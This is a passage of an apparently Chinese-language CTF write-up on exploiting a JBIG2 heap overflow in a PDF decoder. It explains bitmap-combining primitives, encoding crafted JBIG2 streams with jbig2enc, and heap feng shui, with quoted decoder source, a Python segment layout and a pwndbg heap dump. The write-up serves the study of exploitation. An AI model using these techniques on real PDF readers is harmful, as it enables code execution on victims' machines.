              Guint *refSegs,</span></span></span><br><span class="line"><span class="params"><span class="function">                                                 Guint nRefSegs)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="keyword">if</span> (nRefSegs == <span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (!(seg = <span class="built_in">findSegment</span>(refSegs[<span class="number">0</span>])) ||</span><br><span class="line">            seg-&gt;<span class="built_in">getType</span>() != jbig2SegBitmap)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(),</span><br><span class="line">                  <span class="string">&quot;Bad bitmap reference in JBIG2 generic refinement segment&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        refBitmap = (JBIG2Bitmap *)seg;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        refBitmap = pageBitmap-&gt;<span class="built_in">getSlice</span>(x, y, w, h);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// read</span></span><br><span class="line">    bitmap = <span class="built_in">readGenericRefinementRegion</span>(w, h, templ, tpgrOn,</span><br><span class="line">                                         refBitmap, <span class="number">0</span>, <span class="number">0</span>, atx, aty);</span><br><span class="line"></span><br><span class="line">    <span 
class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        bitmap-&gt;<span class="built_in">setSegNum</span>(segNum);</span><br><span class="line">        segments-&gt;<span class="built_in">append</span>(bitmap);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ol><li><p>当 GenericRefinementRegionSeg <strong>不引用任何段时</strong>，变量 nRefSegs 为 0，此时 <strong>refBitmap 为 pageBitmap 上指定 x、y、w、h 属性的一块数据空间</strong>。</p><p>由于函数 <code>readGenericRefinementRegion</code> 只会受到 refBitmap 的影响，因此我们可以认定传出的bitmap 变量等价于 pageBitmap 上特定区域的数据。</p><p>接下来，若我们指定 imm 为 false，那么这块等价于 pageBitmap 上特定区域的数据，将被存储进 segments 数组中。</p></li><li><p>若下一次解析 GenericRefinementRegionSeg  时引用了第一步创建的段，那么此时 refBitmap 为第一步创建的 Bitmap。这样当 imm 为 true 时，第一步创建的 Bitmap 将会和 pageBitmap 上指定的位置进行 combine 操作，即位运算。</p></li><li><p>由于第一步创建的 bitmap 是和 pageBitmap 相关，因此整个过程就等价于</p><ul><li>从 pageBitmap 上<strong>特定位置1</strong>取下一块数据，并保存至 segments 上</li><li>从 segments 上取下这块数据，并将其与 pageBitmap 上<strong>特定位置2</strong>进行位运算。</li></ul><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">+----------------------&gt; x-axis</span><br><span class="line">|</span><br><span class="line">|             .(2)</span><br><span class="line">|</span><br><span class="line">|    .(1)</span><br><span class="line">|</span><br><span class="line">V </span><br><span class="line">y-axis</span><br></pre></td></tr></table></figure></li></ol><p>如此，便达到了<strong>让 pageBitmap 上指定两个位置的数据进行位运算的操作</strong>。我们将使用该操作来一步步构建位运算原语、乃至加法器。</p><h4 id="f-TextRegionSeg">f. TextRegionSeg</h4><p>TextRegionSeg  可以<strong>引用</strong>指定的 <strong>SymbolDictSeg</strong>，并对其中的任意 instance 进行操作。</p><blockquote><p>需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 TextRegionSeg 不能存放在 JBIG2Globals 流中。</p></blockquote><p>整体流程大致如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span 
class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readTextRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                    GBool lossless, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                                    Guint *refSegs, Guint nRefSegs)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// get the symbol bitmaps</span></span><br><span class="line">    <span class="comment">// copy every instance from each referenced segment into the syms array</span></span><br><span class="line">    syms = (JBIG2Bitmap **)<span class="built_in">gmallocn</span>(numSyms, <span class="built_in">sizeof</span>(JBIG2Bitmap *));</span><br><span class="line">    kk = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ((seg = <span 
class="built_in">findSegment</span>(refSegs[i])))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict)</span><br><span class="line">            &#123;</span><br><span class="line">                symbolDict = (JBIG2SymbolDict *)seg;</span><br><span class="line">                <span class="keyword">for</span> (k = <span class="number">0</span>; k &lt; symbolDict-&gt;<span class="built_in">getSize</span>(); ++k)</span><br><span class="line">                &#123;</span><br><span class="line">                    syms[kk++] = symbolDict-&gt;<span class="built_in">getBitmap</span>(k);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// call readTextRegion to combine the selected syms with the newly created bitmap</span></span><br><span class="line">    bitmap = <span class="built_in">readTextRegion</span>(huff, refine, w, h, numInstances,</span><br><span class="line">                            logStrips, numSyms, symCodeTab, symCodeLen, syms,</span><br><span class="line">                            defPixel, combOp, transposed, refCorner, sOffset,</span><br><span class="line">                            huffFSTable, huffDSTable, huffDTTable,</span><br><span class="line">                            huffRDWTable, huffRDHTable,</span><br><span class="line">                            huffRDXTable, huffRDYTable, huffRSizeTable,</span><br><span class="line">                            templ, atx, aty);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">gfree</span>(syms);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page 
bitmap</span></span><br><span class="line">    <span class="comment">// combine the current bitmap into pageBitmap, propagating the values of the referenced instances onto pageBitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pageH == <span class="number">0xffffffff</span> &amp;&amp; y + h &gt; curPageH)</span><br><span class="line">        &#123;</span><br><span class="line">            pageBitmap-&gt;<span class="built_in">expand</span>(y + h, pageDefPixel);</span><br><span class="line">        &#125;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        bitmap-&gt;<span class="built_in">setSegNum</span>(segNum);</span><br><span class="line">        segments-&gt;<span class="built_in">append</span>(bitmap);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-JBIG2Encode">3. JBIG2Encode</h3><h4 id="a-encode-Bitmap">a. 
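encode Bitmap</h4><p>From the Segments source code above, it is easy to see that in bitmap-reading functions such as <code>readGenericBitmap</code>, hso <strong>reads the bitmap from the external JBIG2Stream and decodes it with one of several decoders</strong> (for example, calls such as <code>arithDecoder-&gt;decodeInt</code> appear many times in the code).</p><p>Since we are the ones supplying the external JBIG2Stream, we have to apply the matching encoding to every bitmap we write into the PDF.</p><p>The <code>JBIG2Stream::reset</code> function shown at the very top tells us there are three decoders in total:</p><ul><li><strong>JArithmeticDecoder</strong></li><li>JBIG2HuffmanDecoder</li><li>JBIG2MMRDecoder</li></ul><p>Hand-writing the matching encoder for one of these decoders would make solving the challenge very slow. Instead, we can <strong>use the <code>jbig2enc</code> library</strong> to do the encoding for us. It already implements the encoding side of the <strong>JArithmeticDecoder</strong> state machine, so we can encode bitmaps without understanding the internals.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:agl/jbig2enc.git</span><br></pre></td></tr></table></figure><p>However, the library is written in C++, and writing the entire exploit in C++ as well would be a lot of work. We can therefore use pybind11 to expose part of the jbig2enc interface to Python, so that the exploit itself can be written in Python.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install pybind11-dev</span><br></pre></td></tr></table></figure><p>Finally, note that the <code>jbig2enc</code> interface <strong>uses a lot of pointers</strong>, and <strong>exposing pointers to Python</strong> is a very unwise choice (calling pointer-taking interfaces from Python slows development and <strong>raises the chance of triggering bugs</strong>). It is better to start from what we actually need, namely:</p><blockquote><p><strong>Encode bitmap data in the form that JArithmeticDecoder decodes</strong>.</p></blockquote><p>and write an additional C++ wrapper that implements three encapsulated structs/enums:</p><ul><li><code>ArithEncoder</code>: the class that calls jbig2enc to encode a bitmap</li><li><code>Bitmap</code>: the bitmap data to be encoded</li><li><code>ArithEncoder::Proc</code>: the state enum of the <code>ArithEncoder</code> encoder</li></ul><p>These three structs/enums are then exposed to Python, so that Python never manipulates pointers directly.</p><blockquote><p>The code implemented in this subsection corresponds to the following files in the exp:</p><ul><li><code>hso-groupie/exploit/jbig2arith.[cc,h]</code></li><li><code>hso-groupie/exploit/jbjbarith.[cc,h]</code></li></ul></blockquote><h4 id="b-encode-segments">b. encode segments</h4><p>When reading segments, hso first reads a series of fields and flags for the current segment, such as the segment number segNum, segFlags, and refFlags, and only then reads the bitmap (if there is one).</p><p>We have to place these fields and flags into the JBIG2Stream ourselves as well. Because they are not passed through a decoder, we can simply write code that emits them into the stream one by one.</p><p>This step lives in <code>hso-groupie/exploit/jbig2.py</code> in the exp. For every segment type it uses, the script implements a conversion from a <strong>Python structure to a JBIG2Stream byte stream</strong>. The bitmap encoder interface exposed to Python in the previous subsection is also used in this script.</p><p>This way, once we have designed the specific segments in Python, we can quickly convert them into JBIG2Stream data.</p><h2 id="五、漏洞利用流程">V. Exploitation Flow</h2><h3 id="1-堆风水">1. Heap Feng Shui</h3><h4 id="a-创建堆空洞">a. Creating Heap Holes</h4><p>First, here is the diagram that the rest of this section refers to:</p><p><img src="/2022/02/rwctf2022_hso/a.jpg" alt="img"></p><p>To exploit this heap overflow, we need heap feng shui to place specific structures in specific chunks. The heap feng shui has to achieve the following goals:</p><ul><li><p>When the PDF's TextRegionSeg is parsed, the syms pointer array it creates must land at <code>undersized syms buffer</code>.</p></li><li><p>The segment containing <strong>the JBIG2SymbolDict structure that holds a huge number of pointers</strong> must be placed at <code>segments GList backing buffer</code>.</p><blockquote><p>Here we plan to store the JBIG2SymbolDict structures in the <strong>global segment</strong>, because a SymbolDictSegment does not depend on any other segment, while the later TextRegionSegment depends on these SymbolDictSegments.</p></blockquote></li><li><p>The pageBitmap structure must occupy the <code>JBIG2Bitmap</code> block in the diagram, and its data must occupy the <code>bitmap backing buffer</code> block above it.</p><blockquote><p>Reading through the code shows that the vast majority of segments, when parsed, can combine their bitmap with pageBitmap and store the result in pageBitmap. Giving pageBitmap the out-of-bounds read/write capability is therefore the best choice.</p></blockquote></li></ul><p>We first allocate three SymbolDicts holding different numbers of Bitmaps in the global segment. The different sizes exist so that a later TextRegionSeg can combine them to reach the size that overflows, so <strong>we do not need to care</strong> where these three chunks end up:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 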
class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># global segment</span></span><br><span class="line">global_file = [</span><br><span class="line">    SymbolDict(<span class="number">0</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * <span class="number">0x10000</span>),</span><br><span class="line">    SymbolDict(<span class="number">1</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * (size_to_overflow // <span class="number">8</span>)),</span><br><span class="line">    SymbolDict(<span class="number">2</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)]),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><blockquote><p>Here <code>size_to_overflow</code> is the number of bytes marked <code>overflow</code> in the diagram above. How it is computed is covered later.</p></blockquote><p>Now let's look at the bins after allocating these three SymbolDicts. There are <strong>a large number of fragmented chunks</strong>:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span 
class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">bins</span></span><br><span class="line">tcachebins</span><br><span class="line">0x20 [  4]: 0x55555579f8e0 —▸ 0x5555557b9550 —▸ 0x5555557b0c10 —▸ 0x5555557b0c60 ◂— 0x0</span><br><span class="line">0x30 [  5]: 0x5555557ab330 —▸ 0x5555557b0c30 —▸ 0x5555557b0c80 —▸ 0x555555799280 —▸ 0x5555557992d0 ◂— 0x0</span><br><span class="line">0x40 [  7]: 0x5555557f7f90 —▸ 0x5555557f8f10 —▸ 0x5555557f9100 —▸ 0x5555557f7bb0 —▸ 0x5555557fe710 —▸ 0x5555557a0320 —▸ 0x555555797210 ◂— 0x0</span><br><span class="line">0x50 [  1]: 0x5555557a02b0 ◂— 0x0</span><br><span class="line">0x60 [  4]: 0x5555557ab3c0 —▸ 0x5555557a9e40 —▸ 0x5555557ab890 —▸ 0x5555557ab790 ◂— 0x0</span><br><span class="line">0x70 [  1]: 0x5555557ac760 ◂— 0x0</span><br><span class="line">0x90 [  1]: 0x5555557b94c0 ◂— 0x0</span><br><span class="line">0xa0 [  3]: 0x555555798e00 —▸ 0x5555557b6930 —▸ 0x5555557b6a10 ◂— 0x0</span><br><span class="line">0xb0 [  2]: 
0x5555557ba520 —▸ 0x5555557b9410 ◂— 0x0</span><br><span class="line">0xc0 [  3]: 0x5555557bec00 —▸ 0x5555557bf620 —▸ 0x5555557b1220 ◂— 0x0</span><br><span class="line">0xd0 [  5]: 0x555555799ec0 —▸ 0x5555557b0cb0 —▸ 0x5555557c5400 —▸ 0x5555557c37f0 —▸ 0x5555557bfcf0 ◂— 0x0</span><br><span class="line">0xe0 [  3]: 0x5555557be4b0 —▸ 0x5555557a9a30 —▸ 0x5555557bc750 ◂— 0x0</span><br><span class="line">0xf0 [  3]: 0x5555557c6d30 —▸ 0x5555557bd370 —▸ 0x5555557bd4a0 ◂— 0x0</span><br><span class="line">0x100 [  2]: 0x5555557c4360 —▸ 0x5555557c44a0 ◂— 0x0</span><br><span class="line">0x110 [  1]: 0x555555797100 ◂— 0x0</span><br><span class="line">0x120 [  2]: 0x5555557c1000 —▸ 0x5555557c5880 ◂— 0x0</span><br><span class="line">0x140 [  3]: 0x5555557c7c80 —▸ 0x5555557c7430 —▸ 0x5555557cc180 ◂— 0x0</span><br><span class="line">0x150 [  3]: 0x5555557cdac0 —▸ 0x5555557c83f0 —▸ 0x5555557c8590 ◂— 0x0</span><br><span class="line">0x160 [  2]: 0x55555579fc00 —▸ 0x5555557a4420 ◂— 0x0</span><br><span class="line">0x170 [  3]: 0x555555797c20 —▸ 0x5555557d36c0 —▸ 0x5555557d3550 ◂— 0x0</span><br><span class="line">0x180 [  2]: 0x5555557bff50 —▸ 0x5555557d8010 ◂— 0x0</span><br><span class="line">0x190 [  7]: 0x5555557adb80 —▸ 0x5555557d8530 —▸ 0x5555557ad570 —▸ 0x5555557ac7d0 —▸ 0x5555557a8710 —▸ 0x5555557a8d60 —▸ 0x5555557aad00 ◂— 0x0</span><br><span class="line">0x1a0 [  2]: 0x5555557d2890 —▸ 0x5555557ad700 ◂— 0x0</span><br><span class="line">0x1b0 [  2]: 0x5555557a8ef0 —▸ 0x5555557aea50 ◂— 0x0</span><br><span class="line">0x1c0 [  2]: 0x5555557d1bb0 —▸ 0x55555579ad70 ◂— 0x0</span><br><span class="line">0x1d0 [  2]: 0x555555796b00 —▸ 0x555555796640 ◂— 0x0</span><br><span class="line">0x1f0 [  2]: 0x5555557a6410 —▸ 0x5555557a6220 ◂— 0x0</span><br><span class="line">0x200 [  2]: 0x55555576a670 —▸ 0x5555557aae90 ◂— 0x0</span><br><span class="line">0x220 [  2]: 0x5555557d8310 —▸ 0x5555557ac960 ◂— 0x0</span><br><span class="line">0x230 [  1]: 0x5555557bd980 ◂— 0x0</span><br><span 
class="line">0x270 [  1]: 0x5555557ba6d0 ◂— 0x0</span><br><span class="line">0x2b0 [  1]: 0x5555557abdc0 ◂— 0x0</span><br><span class="line">0x2c0 [  1]: 0x555555798320 ◂— 0x0</span><br><span class="line">0x2e0 [  1]: 0x5555557aa730 ◂— 0x0</span><br><span class="line">0x300 [  2]: 0x5555557a5c60 —▸ 0x5555557a9590 ◂— 0x0</span><br><span class="line">0x310 [  7]: 0x5555557ae510 —▸ 0x5555557ac110 —▸ 0x5555557ad010 —▸ 0x5555557abab0 —▸ 0x5555557a9280 —▸ 0x5555557aa420 —▸ 0x5555557a76c0 ◂— 0x0</span><br><span class="line">0x320 [  3]: 0x555555799f90 —▸ 0x5555557becc0 —▸ 0x5555557bab30 ◂— 0x0</span><br><span class="line">0x350 [  2]: 0x5555557bcb40 —▸ 0x5555557c3bd0 ◂— 0x0</span><br><span class="line">0x390 [  1]: 0x5555557a88a0 ◂— 0x0</span><br><span class="line">0x3b0 [  2]: 0x555555797250 —▸ 0x5555557a79d0 ◂— 0x0</span><br><span class="line">0x3c0 [  1]: 0x5555557d39d0 ◂— 0x0</span><br><span class="line">0x3d0 [  1]: 0x5555557cccc0 ◂— 0x0</span><br><span class="line">0x400 [  1]: 0x55555576aa50 ◂— 0x0</span><br><span class="line">0x410 [  3]: 0x555555797810 —▸ 0x5555557bf1d0 —▸ 0x5555557a7f90 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x5555558304b0 —▸ 0x7ffff7ad8c00 (main_arena+96) ◂— 0x5555558304b0</span><br><span class="line">smallbins</span><br><span class="line">0x20: 0x5555557a99e0 —▸ 0x7ffff7ad8c10 (main_arena+112) ◂— 0x5555557a99e0</span><br><span class="line">0xb0: 0x5555557f82f0 —▸ 0x7ffff7ad8ca0 (main_arena+256) ◂— 0x5555557f82f0</span><br><span class="line">0xf0: 0x5555557d0ab0 —▸ 0x7ffff7ad8ce0 (main_arena+320) ◂— 0x5555557d0ab0</span><br><span class="line">0x120: 0x5555557992f0 —▸ 0x7ffff7ad8d10 
(main_arena+368) ◂— 0x5555557992f0</span><br><span class="line">0x190: 0x5555557f7df0 —▸ 0x5555557f8d70 —▸ 0x5555557f8f60 —▸ 0x5555557f7a10 —▸ 0x5555557fe570 ◂— ...</span><br><span class="line">0x1c0 [corrupted]</span><br><span class="line">FD: 0x5555557f1a30 —▸ 0x5555557f4780 —▸ 0x5555557d15f0 —▸ 0x5555557e49d0 —▸ 0x55555579ecf0 ◂— ...</span><br><span class="line">BK: 0x5555557d0c90 —▸ 0x5555557d06f0 —▸ 0x5555557d1410 —▸ 0x5555557d0e70 —▸ 0x55555579e390 ◂— ...</span><br><span class="line">0x1d0 [corrupted]</span><br><span class="line">FD: 0x5555557f9910 —▸ 0x5555557f9720 —▸ 0x5555557f85b0 —▸ 0x5555557fe960 —▸ 0x5555557f66b0 ◂— ...</span><br><span class="line">BK: 0x5555557f9530 —▸ 0x5555557f9150 —▸ 0x5555557fb050 —▸ 0x5555557fdd90 —▸ 0x5555557fd1e0 ◂— ...</span><br><span class="line">0x1e0 [corrupted]</span><br><span class="line">FD: 0x5555557a13c0 —▸ 0x5555557a0bc0 —▸ 0x5555557a11c0 —▸ 0x5555557a0570 —▸ 0x5555557a0770 ◂— ...</span><br><span class="line">BK: 0x5555557fcbf0 —▸ 0x5555557fc9f0 —▸ 0x5555557fdb90 —▸ 0x5555557fe760 —▸ 0x5555557fc210 ◂— ...</span><br><span class="line">0x1f0: 0x5555557ba930 —▸ 0x5555557f1120 —▸ 0x5555557d19b0 —▸ 0x5555557befd0 —▸ 0x7ffff7ad8de0 (main_arena+576) ◂— ...</span><br><span class="line">0x200: 0x5555557a9b00 —▸ 0x5555557df570 —▸ 0x5555557a8500 —▸ 0x7ffff7ad8df0 (main_arena+592) ◂— 0x5555557a9b00</span><br><span class="line">0x220 [corrupted]</span><br><span class="line">FD: 0x5555557f3c20 —▸ 0x5555557ecce0 —▸ 0x5555557e8180 —▸ 0x5555557f57f0 —▸ 0x5555557ee5a0 ◂— ...</span><br><span class="line">BK: 0x5555557f4540 —▸ 0x5555557f2130 —▸ 0x5555557f27e0 —▸ 0x5555557eec60 —▸ 0x5555557f2ea0 ◂— ...</span><br><span class="line">0x230 [corrupted]</span><br><span class="line">FD: 0x5555557ae810 —▸ 0x5555557f49d0 —▸ 0x5555557e2710 —▸ 0x5555557f4c20 —▸ 0x5555557a0970 ◂— ...</span><br><span class="line">BK: 0x5555557f0a20 —▸ 0x5555557a23a0 —▸ 0x5555557e5a20 —▸ 0x5555557a3d20 —▸ 0x5555557a3f70 ◂— ...</span><br><span class="line">0x240 
[corrupted]</span><br><span class="line">FD: 0x5555557f5590 —▸ 0x5555557f1330 —▸ 0x5555557e3730 —▸ 0x5555557f4e70 —▸ 0x5555557a1ef0 ◂— ...</span><br><span class="line">BK: 0x5555557ec840 —▸ 0x5555557f50d0 —▸ 0x5555557a4660 —▸ 0x5555557e4090 —▸ 0x5555557f5330 ◂— ...</span><br><span class="line">0x250: 0x55555579a760 —▸ 0x7ffff7ad8e40 (main_arena+672) ◂— 0x55555579a760</span><br><span class="line">0x270 [corrupted]</span><br><span class="line">FD: 0x5555557dd3a0 —▸ 0x5555557e1a10 —▸ 0x5555557e0810 —▸ 0x5555557e02e0 —▸ 0x5555557e0aa0 ◂— ...</span><br><span class="line">BK: 0x5555557a54a0 —▸ 0x5555557a5210 —▸ 0x5555557e1f40 —▸ 0x5555557e0aa0 —▸ 0x5555557e02e0 ◂— ...</span><br><span class="line">0x280 [corrupted]</span><br><span class="line">FD: 0x5555557c7560 —▸ 0x5555557b0d70 —▸ 0x5555557e0570 —▸ 0x5555557df2d0 —▸ 0x5555557df810 ◂— ...</span><br><span class="line">BK: 0x5555557e21d0 —▸ 0x5555557deaf0 —▸ 0x5555557df030 —▸ 0x5555557e2470 —▸ 0x5555557ded90 ◂— ...</span><br><span class="line">0x290: 0x5555557acb70 —▸ 0x5555557ddb10 —▸ 0x5555557e0030 —▸ 0x5555557e1760 —▸ 0x5555557de5a0 ◂— ...</span><br><span class="line">0x2a0: 0x5555557dfd70 —▸ 0x5555557dfab0 —▸ 0x7ffff7ad8e90 (main_arena+752) ◂— 0x5555557dfd70</span><br><span class="line">0x2c0: 0x5555557a5f50 —▸ 0x5555557f5c90 —▸ 0x7ffff7ad8eb0 (main_arena+784) ◂— 0x5555557a5f50 /* &#x27;P_zUUU&#x27; */</span><br><span class="line">0x340: 0x5555557f5f70 —▸ 0x5555557ac410 —▸ 0x7ffff7ad8f30 (main_arena+912) ◂— 0x5555557f5f70</span><br><span class="line">0x380: 0x5555557c69a0 —▸ 0x7ffff7ad8f70 (main_arena+976) ◂— 0x5555557c69a0</span><br><span class="line">0x390: 0x5555557d7c70 —▸ 0x7ffff7ad8f80 (main_arena+992) ◂— 0x5555557d7c70 /* &#x27;p|&#125;UUU&#x27; */</span><br><span class="line">0x3b0: 0x5555557c54c0 —▸ 0x7ffff7ad8fa0 (main_arena+1024) ◂— 0x5555557c54c0</span><br><span class="line">0x3f0: 0x5555557bd580 —▸ 0x7ffff7ad8fe0 (main_arena+1088) ◂— 0x5555557bd580</span><br><span class="line">largebins</span><br><span 
